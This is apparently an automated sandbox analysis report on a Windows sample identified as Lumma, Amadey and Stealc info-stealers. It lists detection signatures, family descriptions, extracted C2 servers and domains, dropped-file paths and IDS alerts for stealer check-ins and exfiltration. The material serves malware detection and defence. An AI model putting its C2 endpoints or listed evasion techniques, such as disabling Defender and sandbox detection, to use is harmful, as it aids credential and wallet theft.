Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1546642
MD5: 2422d51ed6d21df3ce5591f3b0a03125
SHA1: 4ec30e94c8c554a45adbc0826e3b97fdf40b0741
SHA256: 98727c9ef422f67f6858530e833b101bf235d8e78b363c201fd0f0125c861c2c
Tags: exeuser-Bitsight
Infos:

Detection

LummaC, Amadey, LummaC Stealer, Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Amadeys stealer DLL
Yara detected LummaC Stealer
Yara detected Stealc
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Creates multiple autostart registry keys
Disable Windows Defender notifications (registry)
Disable Windows Defender real time protection (registry)
Disables Windows Defender Tamper protection
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies windows update settings
PE file contains section with special chars
PE file has a writeable .text section
Query firmware table information (likely to detect VMs)
Sigma detected: New RUN Key Pointing to Suspicious Folder
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for debuggers (devices)
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to detect virtual machines (SLDT)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
PE file does not import any functions
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Sigma detected: CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Name Description Attribution Blogpost URLs Link
Lumma Stealer, LummaC2 Stealer Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
Name Description Attribution Blogpost URLs Link
Amadey Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
Name Description Attribution Blogpost URLs Link
Stealc Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: file.exe Avira: detected
Antivirus detection for URL or domain
Source: http://185.215.113.43/Zu7JuNko/index.php URL Reputation: Label: phishing
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\KOLH45MMED0OMDDRYHIG.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\7URDKE3CJSA37VV3INEEM0S4N1C.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1003145001\1553f88169.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Found malware configuration
Source: 00000003.00000002.1900844822.0000000000391000.00000040.00000001.01000000.00000008.sdmp Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source: file.exe.6800.0.memstrmin Malware Configuration Extractor: LummaC {"C2 url": ["necklacedmny.store", "crisiwarny.store", "thumbystriw.store", "founpiuer.store", "navygenerayk.store", "scriptyprefej.store", "fadehairucw.store", "presticitpo.store"], "Build id": "4SD0y4--legendaryy"}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\num[1].exe ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exe ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Temp\1003145001\1553f88169.exe ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Local\Temp\1003146001\661f3ff865.exe ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Temp\1003147001\num.exe ReversingLabs: Detection: 95%
Multi AV Scanner detection for submitted file
Source: file.exe ReversingLabs: Detection: 47%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 99.3% probability
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\FT773VWATWFL9SRK5RTU4.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1003146001\661f3ff865.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\SWJQ0719J9GFR3PZ91XO7LBLZA7.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1003147001\num.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\KOLH45MMED0OMDDRYHIG.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\7URDKE3CJSA37VV3INEEM0S4N1C.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\num[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1003145001\1553f88169.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: file.exe Joe Sandbox ML: detected
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49910 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49920 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49932 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49946 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49957 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49978 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49989 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49990 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:50002 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:50026 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:50035 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:50049 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:50058 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:50056 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:50072 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:50073 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:50113 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:50115 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:50116 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:50118 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:50119 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:50122 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:50125 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:50126 version: TLS 1.2
Source: Binary string: C:\dvs\p4\build\sw\devrel\Playpen\yyao\VRBench\VR-FCAT\FVSDK_rel_1_0\Symbols\FCAT_DT_Capture_x64.pdb source: is-5MQTR.tmp.11.dr
Source: Binary string: C:\dvs\p4\build\sw\devrel\Playpen\yyao\VRBench\VR-FCAT\FVSDK_rel_1_0\Symbols\FCAT_DT_Capture_x64.pdbz source: is-5MQTR.tmp.11.dr
Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: FT773VWATWFL9SRK5RTU4.exe, 00000002.00000003.1848208544.0000000005050000.00000004.00001000.00020000.00000000.sdmp, FT773VWATWFL9SRK5RTU4.exe, 00000002.00000002.1981148495.0000000000A52000.00000040.00000001.01000000.00000006.sdmp
Source: Binary string: c:\zlib-dll\Release\isunzlib.pdb source: fontcreator.tmp, 00000009.00000003.2434759693.0000000000CB0000.00000004.00001000.00020000.00000000.sdmp, fontcreator.tmp, 00000009.00000003.2431452405.0000000003580000.00000004.00001000.00020000.00000000.sdmp, fontcreator.tmp, 0000000B.00000003.2498773569.0000000001260000.00000004.00001000.00020000.00000000.sdmp, fontcreator.tmp, 0000001A.00000003.2469294133.0000000002BF0000.00000004.00001000.00020000.00000000.sdmp, fontcreator.tmp, 00000020.00000003.2546020895.0000000002500000.00000004.00001000.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\PlaceholderTileLogoFolder Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Comms Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Packages Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\PeerDistRepub Jump to behavior

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2057129 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store) : 192.168.2.4:56920 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057127 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store) : 192.168.2.4:61392 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057125 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store) : 192.168.2.4:56160 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057131 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store) : 192.168.2.4:61870 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057123 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacedmny .store) : 192.168.2.4:57060 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.4:49731 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.4:49736 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.4:49730 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.4:49733 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.4:49737 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.4:49732 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.4:49735 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.4:49734 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.4:49801 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.4:49817
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49854 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49870 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2057131 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store) : 192.168.2.4:51178 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057127 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store) : 192.168.2.4:52094 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057129 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store) : 192.168.2.4:59295 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057125 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store) : 192.168.2.4:57952 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49903 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.4:49910 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.4:49920 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.4:49932 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49939 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.4:49946 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49933 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.4:49957 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2057131 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store) : 192.168.2.4:53957 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057125 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store) : 192.168.2.4:50317 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057129 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store) : 192.168.2.4:49332 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057127 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store) : 192.168.2.4:49916 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.4:49978 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49971 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.4:49989 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49991 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.4:50002 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:50016 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.4:50035 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.4:50026 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.4:50049 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.4:50072 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.4:50073 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.4:50058 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.4:49990 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:50055 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.4:50056 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:50100 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2057129 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store) : 192.168.2.4:62871 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.4:50116 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.4:50113 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2057131 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store) : 192.168.2.4:52181 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057127 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store) : 192.168.2.4:49457 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.4:50119 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.4:50118 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.4:50115 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2057072 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (authorisev .site in TLS SNI) : 192.168.2.4:50127 -> 104.21.85.194:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.4:50125 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.4:50122 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:50124 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.4:50126 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2057072 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (authorisev .site in TLS SNI) : 192.168.2.4:50129 -> 104.21.85.194:443
Source: Network traffic Suricata IDS: 2057071 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (authorisev .site) : 192.168.2.4:54814 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057125 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store) : 192.168.2.4:62875 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057072 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (authorisev .site in TLS SNI) : 192.168.2.4:50131 -> 104.21.85.194:443
Source: Network traffic Suricata IDS: 2057072 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (authorisev .site in TLS SNI) : 192.168.2.4:50133 -> 104.21.85.194:443
Source: Network traffic Suricata IDS: 2057072 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (authorisev .site in TLS SNI) : 192.168.2.4:50134 -> 104.21.85.194:443
Source: Network traffic Suricata IDS: 2057072 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (authorisev .site in TLS SNI) : 192.168.2.4:50147 -> 104.21.85.194:443
Source: Network traffic Suricata IDS: 2057072 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (authorisev .site in TLS SNI) : 192.168.2.4:50141 -> 104.21.85.194:443
Source: Network traffic Suricata IDS: 2057072 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (authorisev .site in TLS SNI) : 192.168.2.4:50158 -> 104.21.85.194:443
Source: Network traffic Suricata IDS: 2057072 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (authorisev .site in TLS SNI) : 192.168.2.4:50186 -> 104.21.85.194:443
Source: Network traffic Suricata IDS: 2057072 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (authorisev .site in TLS SNI) : 192.168.2.4:50187 -> 104.21.85.194:443
Source: Network traffic Suricata IDS: 2057072 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (authorisev .site in TLS SNI) : 192.168.2.4:50191 -> 104.21.85.194:443
Source: Network traffic Suricata IDS: 2057072 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (authorisev .site in TLS SNI) : 192.168.2.4:50189 -> 104.21.85.194:443
Source: Network traffic Suricata IDS: 2057072 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (authorisev .site in TLS SNI) : 192.168.2.4:50195 -> 104.21.85.194:443
